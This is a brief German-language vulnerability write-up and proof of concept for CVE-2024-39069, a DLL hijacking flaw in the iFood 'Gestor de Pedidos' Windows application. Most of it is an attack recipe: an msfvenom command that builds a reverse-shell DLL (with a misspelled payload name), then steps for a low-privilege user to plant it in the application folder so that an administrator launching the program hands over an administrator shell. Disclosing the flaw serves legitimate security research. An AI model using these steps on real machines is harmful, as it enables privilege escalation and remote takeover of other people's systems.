
CVE-2024-39069
Ein Angreifer platziert eine schädliche DLL namens "d3d12.dll" in einem Verzeichnis, das von der Anwendung durchsucht wird, bevor die legitime "d3d12.dll" gefunden wird. Wenn die Anwendung gestartet wird, lädt sie die schädliche DLL anstelle der legitimen, was es dem Angreifer ermöglicht, beliebigen Code im Kontext der Anwendung auszuführen.
Anbieter-Homepage: https://gestordepedidos.ifood.com.br/
Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
POC video: https://youtu.be/oMIobV2M0T8
Erstellen Sie eine schädliche DLL-Datei auf Kali Linux mit msfvenom
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
Übertragen Sie die erstellte 'd3d12.dll' auf den Windows-Host von Kali aus als Benutzer mit niedrigen Berechtigungen
Verschieben Sie die erstellte 'd3d12.dll'-Datei nach 'C:\Gestor de Peddios\d3d12.dll' als Benutzer mit niedrigen Berechtigungen
Wenn der Administrator die Anwendung ausführt, erhalten Sie eine Reverse-Shell als Administrator